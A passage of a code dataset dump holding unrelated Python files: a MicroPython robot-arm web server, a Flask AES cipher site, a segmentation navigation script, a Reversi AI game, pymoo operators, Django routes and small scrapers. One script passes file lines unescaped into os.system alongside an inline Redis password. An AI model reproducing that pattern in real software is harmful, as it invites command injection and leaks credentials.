les différentes positions des servos\n global play_infini\n while play_infini: # thread lance\n mouvements = len(mouvements_pivot)\n for mouvement in range(0, mouvements):\n pivot(mouvements_pivot[mouvement])\n bras_1(mouvements_bras_1[mouvement])\n bras_2(mouvements_bras_2[mouvement])\n bras_3(mouvements_bras_3[mouvement])\n pince(mouvements_pince[mouvement])\n time.sleep_ms(100)\n \nip = config_wifi()\ncommunication = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ncommunication.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ncommunication.bind((ip, 80)) # liaison port http--> TCP 80\ncommunication.listen(5)\ninitialisation_bras()\n\nwhile True:\n client_sock, addr = communication.accept() # attente connexion du client\n requete = client_sock.recv(1024) # on recupere la requete\n requete = str(requete)\n if requete.find('GET /construit_xml') > 0: # on construit le XML de base\n if not play_infini: # si le tread ne tourne pas\n construit_xml() # construit le xml avec les positions des servos\n client_sock.send(XML) # met a jour la page html concernant les sliders\n elif requete.find('GET /set_servo') > 0: # un slider a ete deplace\n play_infini = False # quitte le thread\n tempo1 = requete.find('set_servo') # recupere l'emplacement set_servo\n tempo2 = requete.find(' ', tempo1) # recupere l'emplacement 1er espace\n numero_slider = requete[tempo1 + 9] # recupere le numero de servo\n valeur_slider = requete[tempo1 + 11 : tempo2] # recupere la position du slider\n if numero_slider == \"0\": # on traite le servo moteur du pivot\n pivot(int(valeur_slider)) # positione le pivot\n construit_xml()\n client_sock.send(XML) # met a jour la page html concernant les sliders\n if numero_slider == \"1\": # on traite le servo moteur du bras 1\n bras_1(int(valeur_slider))\n construit_xml()\n client_sock.send(XML) # met a jour la page html concernant les sliders\n if numero_slider == \"2\": # on traite le servo moteur du bras 2\n bras_2(int(valeur_slider))\n construit_xml()\n client_sock.send(XML) # met a jour la page html concernant les sliders\n if numero_slider == \"3\": # on traite le servo moteur du bras 3\n bras_3(int(valeur_slider))\n construit_xml()\n client_sock.send(XML) # met a jour la page html concernant les sliders\n if numero_slider == \"4\": # on traite le servo moteur de la pince\n pince(int(valeur_slider))\n construit_xml()\n client_sock.send(XML) # met a jour la page html concernant les sliders \n elif requete.find('GET /?CMD=init_scenario') > 0:\n # appuie sur le bouton 'init'\n play_infini = False # quitte le thread\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n mouvements_init()\n elif requete.find('GET /?CMD=sauve') > 0:\n # appuie sur le bouton 'sauve'\n play_infini = False # quitte le thread\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n # enregistre la position\n mouvements_sauve()\n elif requete.find('GET /?CMD=play_one') > 0:\n # appuie sur le bouton 'executer une fois'\n play_infini = False # quitte le thread\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n # execute les mouvements sauvegardes\n mouvements_play()\n elif requete.find('GET /?CMD=play_infini') > 0:\n # appuie sur le bouton 'executer en boucle'\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n if not play_infini: # on verifie que le thread ne tourne pas deja\n play_infini = True # autorise le thread a se lancer\n # on lance le Thread qui tourne en tâche de fond\n _thread.start_new_thread(mouvements_play_infini, ())\n else:\n # on envoi la page HTML\n with open('robot_arm_web.html', 'r') as html: \n client_sock.send(html.read())\n client_sock.close() # fermeture de la connexion du client","repo_name":"itechnofrance/micropython","sub_path":"robotique/robot_arm/robot_arm_web.py","file_name":"robot_arm_web.py","file_ext":"py","file_size_in_byte":11085,"program_lang":"python","lang":"fr","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"32004171372","text":"from flask import Flask, flash, render_template, url_for, request, redirect\nfrom datetime import datetime\nimport config\nimport cipher\n\n# app settings\napp = Flask(__name__)\napp.enc_key = config.ENCRYPT_KEY\napp.secret_key = config.SECRET_KEY\napp.url_map.strict_slashes = False\napp.DEBUG = config.DEBUG\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n message = 'Welcome to pycipher.net. Please enter your string to encrypt!'\n\n return render_template(\n 'index.html',\n message=message\n )\n\n\n@app.route('/encrypt', methods=['GET', 'POST'])\ndef encrypt():\n \"\"\"\n Encrypt function\n \"\"\"\n encrypted_string = None\n\n if request.method == 'POST':\n payload = request.form['enc_val'].strip()\n\n if len(payload) != 0:\n try:\n _cipher = cipher.AESCipher(app.enc_key)\n encrypted_string = _cipher.encrypt(payload)\n except (ValueError, TypeError) as e:\n return 'Sorry, an error has occurred ' + str(e)\n\n else:\n encrypted_string = None\n flash('Can not encrypt an empty string. Please try again...')\n\n return render_template(\n 'encrypt.html',\n encrypted_string=encrypted_string\n )\n\n\n@app.route('/decrypt', methods=['GET', 'POST'])\ndef decrypt():\n \"\"\"\n Decrypt function\n \"\"\"\n decrypted_string = None\n\n if request.method == 'POST':\n payload = request.form['enc_val'].strip()\n\n if len(payload) != 0:\n if len(payload) % 2 == 0:\n try:\n _cipher = cipher.AESCipher(app.enc_key)\n decrypted_string = _cipher.decrypt(payload)\n except (ValueError, TypeError) as e:\n return 'Sorry, an error has occurred ' + str(e)\n else:\n decrypted_string = None\n flash('The input string must be a multiple of 16 in order to decrypt. \\\n Please check your input and try again.')\n\n else:\n decrypted_string = None\n flash('Sorry, can not decrypt an empty string. Please check your input and try again...')\n\n return render_template(\n 'decrypt.html',\n decrypted_string=decrypted_string\n )\n\n\n@app.route('/aes', methods=['GET'])\ndef aes():\n return render_template(\n 'aes.html'\n )\n\n\n@app.route('/about', methods=['GET'])\ndef about():\n return render_template(\n 'about.html'\n )\n\n\n@app.route('/docs', methods=['GET'])\ndef docs():\n return render_template(\n 'docs.html'\n )\n\n\n@app.route('/tos', methods=['GET'])\ndef tos():\n return render_template(\n 'tos.html'\n )\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template(\n '404.html'\n ), 404\n\n\n@app.errorhandler(500)\ndef server_error(e):\n return render_template(\n '500.html'\n ), 500\n\n\nif __name__ == '__main__':\n app.run(\n '0.0.0.0',\n debug=app.DEBUG,\n )\n\n\n\n","repo_name":"craigderington/pycipher","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38385158070","text":"import cv2\nimport numpy as np\nimport torch\nfrom torchvision import transforms\nfrom modules.dataloaders.utils import decode_segmap\nfrom modules.models.deeplab_xception import DeepLabv3_plus\nfrom modules.models.sync_batchnorm.replicate import patch_replication_callback\nfrom PIL import Image\nimport os.path as osp\n\nimport aigo_destination_route\nimport threading\n#from ublox_gps import UbloxGps\nimport serial\nimport math\n\n\n#aigo_destination_route.get_route(\"경희대학교 중앙도서관\")\n\n\n\n#임시 linestring 향후 linestring.txt 파싱 후\nlinestring = [[127.08341510840815, 37.240436069188185] , #출발\n [127.08341233624519, 37.24024442466403 ], #도로 인식 후 보행자도로 gps로 교체\n [127.08212911848908, 37.24027217627202 ],\n [127.08205412528905, 37.240272174930624 ],\n [127.08013207664933, 37.24029713765783 ],\n [127.07963767687961, 37.24030268372765 ],\n [127.07956268360199, 37.24030545984253 ],\n [127.07943769454693, 37.240319344887844 ],\n [127.07924326470169, 37.240427662200275 ]]\n\nglobal current_point\ncurrent_point = 0\n\ndef gpsTracking():\n port = serial.Serial('/dev/ttyACM0', baudrate=460800, timeout=1)\n gps = UbloxGps(port)\n \n global g_lon #다른 함수에서 받아올 현재 lon, lat\n global g_lat\n global current_point\n global point_check\n point_check = 0\n with open('points.txt', 'r') as points:\n currentline = points.readline()\n splitline = currentline.split(',')\n while True:\n try: \n coords = gps.geo_coords()\n print(coords.lon, coords.lat)\n current_location_lon = coords.lon\n current_location_lat = coords.lat\n g_lon = current_location_lon\n g_lat = current_location_lat\n except (ValueError, IOError) as err:\n print(err) \n\n if(point_check == 1):\n currentline = points.readline()\n if(currentline == ''):\n break\n splitline = currentline.split(',')\n point_check = 0\n\n point_lon = float(splitline[0])\n point_lat = float(splitline[1])\n route_info = splitline[2]\n\n PTCdistance = math.sqrt((point_lon-current_location_lon)**2 + (point_lat-current_location_lat)**2)\n if (PTCdistance<=0.00001):\n print(route_info)\n point_check = 1\n current_point+=1\n \n port.close()\n\n# t1 = threading.Thread(target=gpsTracking)\n# t1.start()\n\n\n\nMODEL_PATH = \"./run/surface/deeplab/model_best.pth.tar\"\nORIGINAL_HEIGHT = 480\nORIGINAL_WIDTH = 640\nMODEL_HEIGHT = 480 #512\nMODEL_WIDTH = 640 #1024\nNUM_CLASSES = 4 # including background\nCUDA = True if torch.cuda.is_available() else False\n\nMODE = 'jpg' # 'mp4' or 'jpg'\nOVERLAPPING = True # whether to mix segmentation map and original image\n\nCUSTOM_COLOR_MAP = [\n [0, 0, 0], # background\n [255, 0, 255], # crosswalk\n [255, 0, 0], # roadway\n [0, 255, 0], # sidewalk\n] # To ignore unused classes while predicting\nCUSTOM_N_CLASSES = len(CUSTOM_COLOR_MAP)\n\nclass ModelWrapper:\n def __init__(self):\n self.composed_transform = transforms.Compose([\n transforms.Resize((MODEL_HEIGHT, MODEL_WIDTH), interpolation=Image.BILINEAR),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))])\n\n self.model = self.load_model(MODEL_PATH)\n\n @staticmethod\n def load_model(model_path):\n model = DeepLabv3_plus(nInputChannels=3, n_classes=NUM_CLASSES, os=16)\n if CUDA:\n model = torch.nn.DataParallel(model, device_ids=[0])\n patch_replication_callback(model)\n model = model.cuda()\n if not osp.isfile(MODEL_PATH):\n raise RuntimeError(\"=> no checkpoint found at '{}'\".format(model_path))\n checkpoint = torch.load(model_path) #, map_location=torch.device('cpu')\n if CUDA:\n model.module.load_state_dict(checkpoint['state_dict'])\n else:\n model.load_state_dict(checkpoint['state_dict'])\n print(\"=> loaded checkpoint '{}' (epoch: {}, best_pred: {})\"\n .format(model_path, checkpoint['epoch'], checkpoint['best_pred']))\n model.eval()\n return model\n\n def predict(self, rgb_img: np.array):\n x = self.composed_transform(Image.fromarray(rgb_img))\n x = x.unsqueeze(0)\n\n if CUDA:\n x = x.cuda()\n with torch.no_grad():\n output = self.model(x)\n pred = output.data.detach().cpu().numpy()\n pred = np.argmax(pred, axis=1).squeeze(0)\n segmap = decode_segmap(pred, dataset='custom', label_colors=CUSTOM_COLOR_MAP, n_classes=CUSTOM_N_CLASSES)\n segmap = np.array(segmap * 255).astype(np.uint8)\n\n resized = cv2.resize(segmap, (ORIGINAL_WIDTH, ORIGINAL_HEIGHT),\n interpolation=cv2.INTER_NEAREST)\n return resized\n\nmodel_wrapper = ModelWrapper()\n\ncapture = cv2.VideoCapture(0)\n\n\nidx = np.array([320])\n\nroad_way_count = 0 \n\ng_lon, g_lat = 127.08341510840815, 37.240436069188185 # 도로를 인식한 위치라 가정\ncurrent_point = 1\nwhile True:\n ret, frame = capture.read()\n\n if ret == False:\n continue\n \n segmap = model_wrapper.predict(frame)\n \n if OVERLAPPING:\n h, w, _ = np.array(segmap).shape\n img_resized = cv2.resize(frame, (w, h))\n result = (img_resized * 0.5 + segmap * 0.5).astype(np.uint8)\n else:\n result = segmap\n\n # boundary = np.where((result[:,:,0] == 255)&(result[:,:,1] == 0)&(result[:,:,2] == 0))\n # print(boundary)\n # print(result.shape)\n\n detect_array = result[200:265,320:330]\n boolean_indexing = (detect_array[:,:,0] == 255)&(detect_array[:,:,1] == 0)&(detect_array[:,:,2] == 0)\n boolean_set = np.unique(boolean_indexing)\n if(boolean_set.size == 1 & boolean_set[0] == True):\n road_way_count+=1\n\n print(road_way_count)\n\n if(road_way_count == 100):\n imu = \"South\" # mqtt로 받아옴 , current_point = 1\n if(imu == \"South\"):\n direction = g_lon - linestring[current_point+1][0]\n if(direction > 0):\n next_point_lon = g_lon - 0.00005 # green확인 후 이동\n next_point_lat = g_lat\n linestring.insert(current_point+1,[next_point_lon,next_point_lat])\n print(linestring)\n\n\n\n\n cv2.imshow('image', result[200:265,320:330])\n cv2.imshow('image2', result)\n key = cv2.waitKey(1)\n if key == 27:\n break","repo_name":"hongju-jeong/segmentation-selectstar-live","sub_path":"live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"134167823","text":"import tkinter\nimport tkinter.messagebox\nimport random\n\nscore = [0]*3 # 対戦結果\nmatch = 0 # 対戦回数\n\nFS = (\"Times New Roman\", 30)\nFL = (\"Times New Roman\", 60)\nBLACK = 1\nWHITE = 2\nproc = 0\nturn = 0\nmsg = \"\"\nspace = 0\ncolor = [0]*2\nboard = []\nback = []\nfor y in range(8):\n board.append([0]*8)\n back.append([0]*8)\n\ndef banmen():\n cvs.delete(\"all\")\n cvs.create_text(320, 670, text=msg, fill=\"silver\", font=FS)\n for y in range(8):\n for x in range(8):\n X = x*80\n Y = y*80\n cvs.create_rectangle(X, Y, X+80, Y+80, outline=\"black\")\n if board[y][x]==BLACK:\n cvs.create_oval(X+10, Y+10, X+70, Y+70, fill=\"black\", width=0)\n if board[y][x]==WHITE:\n cvs.create_oval(X+10, Y+10, X+70, Y+70, fill=\"white\", width=0)\n cvs.update()\n\ndef ban_syokika():\n global space\n space = 60\n for y in range(8):\n for x in range(8):\n board[y][x] = 0\n board[3][4] = BLACK\n board[4][3] = BLACK\n board[3][3] = WHITE\n board[4][4] = WHITE\n\n# 石を打ち、相手の石をひっくり返す\ndef ishi_utsu(x, y, iro):\n board[y][x] = iro\n for dy in range(-1, 2):\n for dx in range(-1, 2):\n k = 0\n sx = x\n sy = y\n while True:\n sx += dx\n sy += dy\n if sx<0 or sx>7 or sy<0 or sy>7:\n break\n if board[sy][sx]==0:\n break\n if board[sy][sx]==3-iro:\n k += 1\n if board[sy][sx]==iro:\n for i in range(k):\n sx -= dx\n sy -= dy\n board[sy][sx] = iro\n break\n\n# そこに打つといくつ返せるか数える\ndef kaeseru(x, y, iro):\n if board[y][x]>0:\n return -1 # 置けないマス\n total = 0\n for dy in range(-1, 2):\n for dx in range(-1, 2):\n k = 0\n sx = x\n sy = y\n while True:\n sx += dx\n sy += dy\n if sx<0 or sx>7 or sy<0 or sy>7:\n break\n if board[sy][sx]==0:\n break\n if board[sy][sx]==3-iro:\n k += 1\n if board[sy][sx]==iro:\n total += k\n break\n return total\n\n# 打てるマスがあるか調べる\ndef uteru_masu(iro):\n for y in range(8):\n for x in range(8):\n if kaeseru(x, y, iro)>0:\n return True\n return False\n\n# 黒い石、白い石、いくつかあるか数える\ndef ishino_kazu():\n b = 0\n w = 0\n for y in range(8):\n for x in range(8):\n if board[y][x]==BLACK: b += 1\n if board[y][x]==WHITE: w += 1\n return b, w\n\n#コンピュータの思考ルーチン\ndef computer_0(iro): # ランダムに打つ\n while True:\n rx = random.randint(0, 7)\n ry = random.randint(0, 7)\n if kaeseru(rx, ry, iro)>0:\n return rx, ry\n\npoint = [\n [6,2,5,4,4,5,2,6],\n [2,1,3,3,3,3,1,2],\n [5,3,3,3,3,3,3,5],\n [4,3,3,0,0,3,3,4],\n [4,3,3,0,0,3,3,4],\n [5,3,3,3,3,3,3,5],\n [2,1,3,3,3,3,1,2],\n [6,2,5,4,4,5,2,6]\n]\ndef computer_1(iro): # 優先的に打つべきマスを選ぶ\n sx = 0\n sy = 0\n p = 0\n for y in range(8):\n for x in range(8):\n if kaeseru(x, y, iro)>0 and point[y][x]>p:\n p = point[y][x]\n sx = x\n sy = y\n return sx, sy\n\n# モンテカルロ法による思考ルーチン\ndef save():\n for y in range(8):\n for x in range(8):\n back[y][x] = board[y][x]\n\ndef load():\n for y in range(8):\n for x in range(8):\n board[y][x] = back[y][x]\n\ndef uchiau(iro):\n while True:\n if uteru_masu(BLACK)==False and uteru_masu(WHITE)==False:\n break\n iro = 3-iro\n if uteru_masu(iro)==True:\n while True:\n x = random.randint(0, 7)\n y = random.randint(0, 7)\n if kaeseru(x, y, iro)>0:\n ishi_utsu(x, y, iro)\n break\n\ndef computer_2(iro, loops):\n global msg\n win = [0]*64\n save()\n for y in range(8):\n for x in range(8):\n if kaeseru(x, y, iro)>0:\n msg += \".\"\n banmen()\n win[x+y*8] = 1\n for i in range(loops):\n ishi_utsu(x, y, iro)\n uchiau(iro)\n b, w = ishino_kazu()\n if iro==BLACK and b>w:\n win[x+y*8] += 1\n if iro==WHITE and w>b:\n win[x+y*8] += 1\n load()\n m = 0\n n = 0\n for i in range(64):\n if win[i]>m:\n m = win[i]\n n = i\n x = n%8\n y = int(n/8)\n return x, y\n\ndef main():\n global proc, turn, msg, space, match\n banmen()\n if proc==0: # タイトル画面\n cvs.create_text(320, 200, text=\"Reversi AUTO\", fill=\"gold\", font=FL)\n ban_syokika()\n color[0] = BLACK\n color[1] = WHITE\n turn = 0\n proc = 1\n elif proc==1: # どちらの番か表示\n msg = \"アルゴリズム \"+str(turn)+\" 思考中\"\n proc = 2\n elif proc==2: # 石を打つマスを決める\n if turn==0: # アルゴリズム 先手\n cx, cy = computer_1(color[turn])\n ishi_utsu(cx, cy, color[turn])\n space -= 1\n proc = 3\n else: # アルゴリズム 後手\n cx, cy = computer_2(color[turn], 30)\n ishi_utsu(cx, cy, color[turn])\n space -= 1\n proc = 3\n elif proc==3: # 打つ番を交代\n msg = \"\"\n turn = 1-turn\n proc = 4\n elif proc==4: # 打てるマスがあるか\n if space==0:\n proc = 5\n elif uteru_masu(BLACK)==False and uteru_masu(WHITE)==False:\n msg = \"どちらも打てないので終了\"\n proc = 5\n elif uteru_masu(color[turn])==False:\n msg = \"COM\"+str(turn)+\"は打てるマスがないのでパス\"\n proc = 3\n else:\n proc = 1\n elif proc==5: # 勝敗判定\n b, w = ishino_kazu()\n if (color[0]==BLACK and b>w) or (color[0]==WHITE and w>b):\n score[0] += 1\n elif (color[1]==BLACK and b>w) or (color[1]==WHITE and w>b):\n score[1] += 1\n else:\n score[2] += 1\n\n # 結果を表示する\n match += 1\n print(\"--------------------\")\n print(\"対戦回数\", match)\n print(\"黒\", b, \" 白\", w)\n print(\"COM(先手) WIN\", score[0])\n print(\"COM(後手) WIN\", score[1])\n print(\"DRAW\", score[2]) \n if match%100==0:\n tkinter.messagebox.showinfo(\"\", \"100試合ごとに一時停止します\")\n proc = 0\n root.after(1, main) # アルゴリズムの対戦 100msecを1msec\n\nroot = tkinter.Tk()\nroot.title(\"リバーシ\")\nroot.resizable(False, False)\ncvs = tkinter.Canvas(width=640, height=700, bg=\"green\")\ncvs.pack()\nroot.after(100, main)\nroot.mainloop()\n","repo_name":"tossy0130/python_game_algorithm_01","sub_path":"PyG_algorithm/Chapter8/reversi_auto.py","file_name":"reversi_auto.py","file_ext":"py","file_size_in_byte":7260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9354067440","text":"import numpy as np\n\nfrom pymoo.model.crossover import Crossover\nfrom pymoo.model.mutation import Mutation\nfrom pymoo.model.sampling import Sampling\n\n\ndef prepare_processing(mask, operators):\n process = []\n\n # create a numpy array of mask if it is not yet\n mask = np.array(mask)\n\n for val in np.unique(mask):\n\n # check if operator for that type was defined\n if val not in operators:\n raise Exception(\"Operator for type %s was not defined.\" % val)\n\n # append it as a processing type\n process.append({\n \"type\": val,\n \"mask\": mask == val,\n \"operator\": operators[val]\n })\n\n return process\n\n\ndef apply_mixed_variable_operation(problem, process, fun):\n\n # the result to be returned\n ret = []\n\n # save the original bounds of the problem\n _n_var, _xl, _xu = problem.n_var, problem.xl, problem.xu\n\n # iterate through all the different operators that should be applied\n for entry in process:\n # get the mask and the operator\n mask, operator = entry[\"mask\"], entry[\"operator\"]\n\n # copy the arrays of the problem and cast them to float\n problem.n_var, problem.xl, problem.xu = mask.sum(), _xl[mask], _xu[mask]\n\n # perform the crossover\n ret.append(fun(mask, operator))\n\n # reset the original bounds of the problem\n problem.n_var = _n_var\n problem.xl = _xl\n problem.xu = _xu\n\n return ret\n\n\ndef concatenate_mixed_variables(problem, process, ret):\n # find the minimum of returned individuals and make them equal among operators\n n_rows = min([len(e) for e in ret])\n ret = [e[:n_rows] for e in ret]\n\n # create the result array and set the values for each operator\n X = np.full((n_rows, problem.n_var), np.nan, dtype=np.object)\n\n for i in range(len(process)):\n mask, _X = process[i][\"mask\"], ret[i]\n X[:, mask] = _X\n\n return X\n\n\nclass MixedVariableCrossover(Crossover):\n\n def __init__(self, mask, operators):\n\n n_parents = np.unique(np.array([op.n_parents for op in operators.values()]))\n if len(n_parents) > 1:\n raise Exception(\"All crossovers need to have the same number of parents!\")\n\n n_offsprings = np.unique(np.array([op.n_offsprings for op in operators.values()]))\n if len(n_offsprings) > 1:\n raise Exception(\"All crossovers need to have the same number of offsprings!\")\n\n super().__init__(n_parents[0], n_offsprings[0])\n self.process = prepare_processing(mask, operators)\n\n def _do(self, problem, X, **kwargs):\n\n _, n_matings, n_var = X.shape\n\n def fun(mask, operator):\n return operator._do(problem, X[..., mask], **kwargs)\n\n ret = apply_mixed_variable_operation(problem, self.process, fun)\n\n # for the crossover the concatenation is different through the 3d arrays.\n X = np.full((self.n_offsprings, n_matings, n_var), np.nan, dtype=np.object)\n for i in range(len(self.process)):\n mask, _X = self.process[i][\"mask\"], ret[i]\n X[..., mask] = _X\n\n return X\n\n\nclass MixedVariableMutation(Mutation):\n\n def __init__(self, mask, operators):\n super().__init__()\n self.process = prepare_processing(mask, operators)\n\n def _do(self, problem, X, **kwargs):\n def fun(mask, operator):\n return operator._do(problem, X[:, mask], **kwargs)\n\n ret = apply_mixed_variable_operation(problem, self.process, fun)\n return concatenate_mixed_variables(problem, self.process, ret)\n\n\nclass MixedVariableSampling(Sampling):\n\n def __init__(self, mask, operators):\n super().__init__()\n self.process = prepare_processing(mask, operators)\n\n def _do(self, problem, n_samples, **kwargs):\n def fun(mask, operator):\n return operator._do(problem, n_samples, **kwargs)\n\n ret = apply_mixed_variable_operation(problem, self.process, fun)\n return concatenate_mixed_variables(problem, self.process, ret)\n","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/pymoo/operators/mixed_variable_operator.py","file_name":"mixed_variable_operator.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"10231402939","text":"import logging\nlogging.basicConfig(level = logging.DEBUG, format= '%(asctime)s - %(levelname)s %(message)s')\n#this hides all logging\n#logging.disable(logging.CRITICAL)\nlogging.debug('Start of program')\ndef factorial(n):\n logging.debug('Start of factorial(%s%%)' % (n))\n total = 1\n#this is where d error is so I will replace it with line 9 fix d bug\n# for i in range(n+ 1):\n for i in range(1, n +1):\n total *= i\n logging.debug('i is ' + str(i) + ', total is ' + str(total))\n logging.debug('End of factorial(%s%%)' % (n))\n return total\nprint(factorial(5))\nlogging.debug('End of programl')","repo_name":"Zcamm7417/zip-file","sub_path":"debuggingWithLoggingModule.py","file_name":"debuggingWithLoggingModule.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35752756413","text":"\"\"\"mysite URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path,include\r\nfrom website.views import *\r\nfrom django.conf.urls import url\r\nfrom mysite import settings\r\nfrom django.views.static import serve\r\n\r\n\r\n\r\nurlpatterns = [\r\n url(r'^static/(?P.*)$',serve,{'document_root':settings.STATIC_ROOT},name='static'),\r\n path('index/', index),\r\n path('appendix/', appendix),\r\n path('appendix2/', appendix2),\r\n path('directions///', directions), \r\n path('directions/', directions), \r\n path('introduction/', introduction),\r\n path('name_search/', name_search),\r\n path('news/', news),\r\n path('news_detail//', news_detail),\r\n path('resource//', resource),\r\n path('resource/', resource),\r\n path('resource_learning/', resource_learning),\r\n path('resource_download/', resource_download),\r\n path('search_list/', search_list),\r\n path('search_notlist/', search_notlist),\r\n path('search_result/', search_result),\r\n path('site_search/', site_search),\r\n path('sitemap/', sitemap),\r\n path('thesaurus/', thesaurus),\r\n path('backend_login/', backend_login),\r\n #for solr\r\n path('solr_search/', solr_search),\r\n path('download_resource/', download_resource),\r\n]\r\n","repo_name":"tingggyu/-","sub_path":"hakkadict/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34298792477","text":"def clean_headers(raw_headers: str):\n is_name = True\n name: str = ''\n headers = {}\n for i, line in enumerate(filter(None, raw_headers.splitlines())):\n if not is_name:\n headers[name] = line\n is_name = True\n continue\n\n if line[-1] != ':':\n raise ValueError(f'Unexpected string: {line} on {i + 1}th line.')\n\n name = line.removesuffix(':')\n is_name = False\n\n return headers\n","repo_name":"ilotoki0804/requests-utils","sub_path":"resoup/header_utils.py","file_name":"header_utils.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43437341288","text":"import json\nfrom uuid import UUID\n\n\nclass LikeEncoder(json.JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, UUID):\n return obj.hex\n try:\n to_serialize = {\n 'post_id': obj.post_id.hex,\n 'author_id': obj.author_id\n }\n return to_serialize\n except AttributeError:\n return super().default(obj)\n","repo_name":"mgodkowicz/PostsService","sub_path":"application/serializers/like_serializers.py","file_name":"like_serializers.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23258650607","text":"# -*- coding: utf-8 -*- \nfrom selenium import webdriver\nfrom time import sleep\n\ndriver = webdriver.Chrome('/Users/jeongjin-a/Desktop/craw/chromedriver')\ndriver.implicitly_wait(3)\n\nlast_num = 813\n\n\nwhile True:\n\tdriver.get('http://job.postech.ac.kr/index.php/sample-page/?pageid=1&mod=list&category1=%EC%B1%84%EC%9A%A9%EA%B3%B5%EA%B3%A0')\n\n\trecent_num = driver.find_element_by_xpath('//*[@id=\"kboard-default-list\"]/div[4]/table/tbody/tr[1]/td[1]').text\n\n\twhile True:\n\t\tif int(recent_num) > last_num:\n\n\t\t\tdriver.get('http://job.postech.ac.kr/index.php/sample-page/?pageid=1&mod=list&category1=%EC%B1%84%EC%9A%A9%EA%B3%B5%EA%B3%A0')\n\t\t\t\n\t\t\tdriver.find_element_by_xpath('//*[@id=\"kboard-default-list\"]/div[4]/table/tbody/tr['+str(int(recent_num)-last_num)+']/td[2]/a/div').click()\n\n\t\t\tlast_num=last_num+1\n\t\t\t\n\t\t\ttitle = driver.find_element_by_xpath('//*[@id=\"kboard-default-document\"]/div[1]/div[1]/h1').text\n\t\t\tcontents = driver.find_element_by_xpath('//*[@id=\"kboard-default-document\"]/div[1]/div[3]/div').text\n\t\t\t\n\t\t\tprint(title)\n\t\t\tprint(contents)\n\n\n\t\t\ttry:\n\t\t\t\timg = driver.find_element_by_xpath('//*[@id=\"kboard-default-document\"]/div[1]/div[3]/div/img').get_attribute('src')\n\t\n\t\t\t\tprint(\"img: \"+img)\n\n\t\t\texcept:\n\t\t\t\tprint(\"\")\n\n\n\t\t\ttry:\n\t\t\t\turl = driver.find_element_by_xpath('//*[@id=\"kboard-default-document\"]/div[1]/div[5]/button').get_attribute('onclick')\n\t\n\t\t\t\tprint(\"url: \"+url[22:-1])\n\n\t\t\texcept:\n\t\t\t\tprint(\"\")\n\n\t\telse:\n\t\t\tbreak\n\n\tsleep(100)\n\n\n\n\n","repo_name":"jjayd/team1","sub_path":"jobpost.py","file_name":"jobpost.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2087013676","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\n\nimport os\nimport sys\n\nif __name__ == '__main__':\n with open(sys.argv[1], 'r') as f:\n lines = f.readlines()\n for line in lines:\n os.system('redis-cli -a kNlTR2nPrv lpush more_reviews ' + line + '/') \n","repo_name":"snjoer/Douban_Crawler","sub_path":"douban_movie/movie_crawler/review_links/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"5152903448","text":"\n##########################################################################\n## Imports\n##########################################################################\n\nimport uuid\nimport btrdb\nimport warnings\nfrom tqdm import tqdm\nfrom btrdb.utils.timez import to_nanoseconds\n\nfrom pgimport.parse import StreamData\n\n##########################################################################\n## Module Variables and Constants\n##########################################################################\n\nINSERT_CHUNK_SIZE = 50000\nMERGE_POLICIES = [\"never\", \"retain\", \"replace\", \"equal\"]\n\n##########################################################################\n## Warnings\n##########################################################################\n\nclass NullValuesWarning(UserWarning):\n \"\"\"\n Alerts users that null values were detected in data to be inserted\n and data will be dropped, as BTrDB cannot accept null values\n \"\"\"\n pass\n\nclass ProgressBarWarning(UserWarning):\n \"\"\"\n Alerts users that a progress bar will not be displayed because total\n points was not provided\n \"\"\"\n pass\n\n##########################################################################\n## 